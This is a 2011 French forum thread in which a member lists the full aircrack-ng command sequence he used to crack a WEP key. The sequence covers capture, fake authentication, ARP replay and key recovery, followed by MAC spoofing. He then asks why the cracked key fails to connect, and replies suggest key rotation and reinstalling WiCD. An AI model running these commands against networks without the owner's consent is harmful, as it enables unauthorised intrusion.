Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-06-2011 20:33:18

MatQ29
N00b

Impossible de se connecter aprés cassage de la cle

Bonjour je regarde le fofo depuis un certain temps et j'avais pas envis de poster mon probleme en pensant que quelqun eu le même.

Mais je pense que je n'est pas vus.

Alors je vous expliquez tout de A a Z

J'ai backtrack v5 avec une carte alfa network awus036h

Donc je lance le terminal et je fais c'est commande

-> airmon-ng
-> airmon-ng start wlan0
-> airodump-ng --encrypt wep mon0
-> airodump-ng --bssid BSSID -c CHANEL -w CAPTURE mon0

J'ouvre un nouveaux terminal

-> aireplay-ng -1 0 -a BSSID -b BSSID -h MAC CLIENT mon0 (Succefiul)
-> aireplay-ng -3 -a BSSID -b BSSID -h MAC CLIENT -x 600 -r capture-01.cap mon0

J'attend de recevoir les premiers ARP et puis aprés j'attend qu'il y est 60 000 datas et aprés

J'ouvre un nouveaux terminal

-> aircrack-ng capture-01.cap

Ensuite je récupére la WEP et je tape dans un terminal

-> ifconfig wlan0 down
-> ifconfig wlan0 hw ether MAC CLIENT
-> ifconfig wlan0 up

Ensuite go dans network manager je vais sur la connexion propriété -> WEP -> Je rentre la clef  sans les points (logique)

et LAaA CONNNNEXXIONNNNNN !!!

Et ensuite BAD PASSWORD sad

J'ai essayer avec mon réseau et celui du voisin en demandant au préalable l'autorisation wink

Sa marche pas:/

Expert qu'en pensez vous c'est vrais qu'il y plein de tuto sur comment avoir la clef mais pas comment faire aprés !

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-06-2011 20:39:47

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : Impossible de se connecter aprés cassage de la cle

Une question si l'authentification est un succès (aireplay -1) pourquoi changer d'adresse mac après ?
As tu utilisé celle d'une station présente sur l'AP ?
Cela dit à part un conflit d'adresse mac cela n'explique pas le problème.

Es tu sur que la clef wep ne change pas régulièrement ?

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 30-06-2011 21:17:15

antares145
Membre d'honneur
Site Web

Aaaaah, ça fait plaisir de voir un membre (un nouveau, qui plus est) qui donne autant de détails pour expliquer son problème. C'est juste, c'est clair, impec ! J'apprécie ! smile

La seule précision qu'il manque, c'est la version exacte de BT5 (32 ou 64 bits, Gnome ou KDE). Mais tu pouvais pas deviner qu'il y avait des différences à ce niveau-là : il semble que WiCD soit buggé dans certains versions (genre Gnome), on en avait discuté récemment et je pense que désinstaller/réinstaller WiCD règle le problème...
--> Backtrack 5 bug keys wifi ?

Si tu sais te connecter à Internet autrement que par cette connexion, voilà les commandes nécessaires :

apt-get remove --purge wicd-*
apt-get update
apt-get install wicd-*
# Tape juste [ENTER] quand il t'interroge sur les groupes à ajouter à netdev

Au passage, je me pose la même question que Noireaude : pourquoi changer ton adresse MAC si ton authentification passe avec l'adresse normale ?

#4 30-06-2011 21:40:35

MatQ29
N00b

Alors merci des réponses, mieux que CCM ca !!

Alors j'ai essayer en mettant mon MAC de base au niveau de aireplay-ng -1 et la connexion finale
j'ai aussi essayer de modifier la MAC en mettant celle du client au stade ou je suis encore que a airodump-ng

Donc dans les deux cas la mac est pareil a aireplay-ng -1 que a la connexion final

Ensuite BT5 GNOME 32 bits pour te répondre

Donc la  premiere solution serait de desinstal wicd et de le re instal ?

Voila d'autre question ?

Annonce